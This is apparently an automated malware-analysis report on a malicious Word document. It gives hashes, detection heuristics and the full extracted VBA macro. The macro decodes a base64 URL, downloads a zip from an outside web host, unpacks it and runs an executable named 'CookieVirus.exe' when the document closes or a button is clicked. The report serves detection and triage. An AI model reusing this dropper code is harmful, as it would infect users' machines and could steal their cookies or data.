Office (OOXML) malware analysis — malicious · d1db7a99fbefc220

MALICIOUS

Office (OOXML)

20.81 MB Created: 2021-02-24 13:52:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-03-01

MD5: e428e5efd261b8a854d3bf746db7db14 SHA-1: 43683122c14ba7d9067935d00923c13dc98e04e8 SHA-256: d1db7a99fbefc220e27eeb86eae2cfce457452ad1bea75c10c8effd2d0267886

262 Risk Score

Heuristics 7

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set oShell = CreateObject("WScript.Shell")
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
        SaveBinaryData Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA=="), objWinHttp.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set BinaryStream = CreateObject("ADODB.Stream")
```

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

    oShell.Run "cmd.exe /R /min cd C:\Users\" & User & "\Documents\Test\netcoreapp3.1 && CookieVirus.exe"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://Motobit.cz Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4468 bytes
SHA-256: `29c3803c55b4692f04e50696059b36a83028404a60769f1008d2cb4403341a34`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton" Private Sub CommandButton1_Click() abcRun End Sub Function SaveBinaryData(FileName, Data) ' adTypeText for binary = 1 Const adTypeText = 1 Const adSaveCreateOverWrite = 2 ' Create Stream object Dim BinaryStream Set BinaryStream = CreateObject("ADODB.Stream") ' Specify stream type - we want To save Data/string data. BinaryStream.Type = adTypeText ' Open the stream And write binary data To the object BinaryStream.Open BinaryStream.Write Data ' Save binary data To disk BinaryStream.SaveToFile FileName, adSaveCreateOverWrite End Function Function abcRun() Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1") Set oShell = CreateObject("WScript.Shell") User = oShell.ExpandEnvironmentStrings("%USERNAME%") URL = Base64Decode("aHR0cHM6Ly9raXRodWF0cGhhbm1lbS4wMDB3ZWJob3N0YXBwLmNvbS9jaGFyZS90ZXN0LnppcA==") Dim FSO Set FSO = CreateObject("Scripting.FileSystemObject") If FSO.FileExists(Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==")) = False Then objWinHttp.Open "GET", URL, False objWinHttp.send "" SaveBinaryData Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA=="), objWinHttp.responseBody ZipFile = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==") ExtractTo = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1xUZXN0XA==") If Not FSO.FolderExists(ExtractTo) Then FSO.CreateFolder (ExtractTo) End If Set objShell = CreateObject("Shell.Application") Set FilesInZip = objShell.NameSpace(ZipFile).items objShell.NameSpace(ExtractTo).CopyHere (FilesInZip) End If Set FSO = Nothing Set objShell = Nothing oShell.Run "cmd.exe /R /min cd C:\Users\" & User & "\Documents\Test\netcoreapp3.1 && CookieVirus.exe" End Function Private Sub Document_Close() abcRun End Sub Function Base64Decode(ByVal base64String) 'rfc1521 '1999 Antonin Foller, Motobit Software, http://Motobit.cz Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin 'remove white spaces, If any base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "") 'The source must consists from groups with Len of 4 chars dataLength = Len(base64String) If dataLength Mod 4 <> 0 Then Err.Raise 1, "Base64Decode", "Bad Base64 string." Exit Function End If ' Now decode each group: For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut ' Each data group encodes up To 3 actual bytes. numDataBytes = 3 nGroup = 0 For CharCounter = 0 To 3 ' Convert each character into 6 bits of data, And add it To ' an integer For temporary storage. If a character is a '=', there ' is one fewer data byte. (There can only be a maximum of 2 '=' In ' the whole string.) thisChar = Mid(base64String, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 End If If thisData = -1 Then Err.Raise 2, "Base64Decode", "Bad character In Base64 string." Exit Function End If nGroup = 64 * nGroup + thisData Next 'Hex splits the long To 6 groups with 4 bits nGroup = Hex(nGroup) 'Add leading zeros nGroup = String(6 - Len(nGroup), "0") & nGroup 'Convert the 3 byte hex integer (6 chars) To 3 characters pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 5, 2))) 'add numDataBytes characters To out string sOut = sOut & Left(pOut, numDataBytes) Next Base64Decode = sOut End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	19968 bytes
SHA-256: `9b774ca96ebd5cd71671f45583f8358b7ab217bcc447fa02ce94b4e4bb9700f0`

Open this report in the interactive analyzer, or submit your own file for analysis.